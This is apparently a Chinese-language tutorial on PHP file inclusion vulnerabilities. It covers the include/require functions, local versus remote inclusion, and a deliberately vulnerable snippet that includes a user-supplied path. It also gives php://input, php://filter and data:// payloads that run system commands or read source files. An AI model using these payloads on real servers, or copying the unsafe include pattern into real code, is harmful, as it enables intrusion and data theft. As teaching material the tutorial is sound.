文件包含漏洞
在通过 PHP 的函数引入文件时,为了灵活包含文件会将被包含文件设置为变量,通过动态变量来引入需要包含的文件。此时用户可以对变量的值可控,而服务器端未对变量值进行合理地校验或者校验被绕过,就会导致文件包含漏洞。
文件包含函数
include()
代码执行到 include() 函数时将文件包含
include_once()
当重复调用同一文件时只调用一次,功能与 include() 相同
require()
require() 执行如果发生错误,函数会报错并终止脚本
require_once()
当重复调用同一文件时只调用一次,功能与 require() 相同
文件包含漏洞分类
本地包含
当包含的文件在服务器本地时,就形成了本地文件包含。文件包含可以包含任意文件,被包含的文件可以不是 PHP 代码,可以是文本或图片等。只要文件被包含就会被服务器脚本语言执行,如果包含的文件内容不符合 php 语法,会直接将文件内容输出。
<?php
$file = $_GET['file'];
include($file);
?>
远程包含
当包含的文件在远程服务器上时,就形成了远程文件包含。所包含远程服务器的文件后缀不能与目标服务器语言相同,远程文件包含需要在 php.ini 中设置:
allow_url_include = on(是否允许 include/require 远程文件)
allow_url_fopen = on(是否允许打开远程文件)
php伪协议
php://input
php 协议还常用 php://input,这可以访问请求的原始数据的只读流,可以读取 POST 请求的参数。
?file=php://input
post传参:
<?php system("ls /");?>
然后查看文件内容:
无过滤
php://filter/resource=
字符串过滤
php://filter/read=string.rot13/resource=
php://filter/read=string.toupper/resource=
php://filter/read=string.tolower/resource=
php://filter/read=string.string_tags/resource=
转换过滤
php://filter/read=convert.base64-encode/resource=
php://filter/read=convert.quoted-printable-encode/resource=
data 伪协议
php 5.2.0 起,数据流封装器开始有效,主要用于数据流的读取,如果传入的数据是PHP代码就会执行代码。使用方法为:
data://text/plain;base64,xxxx(base64编码后的数据)
eg:
<?php system("ls /")?>
?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJscyAvIik/Pg==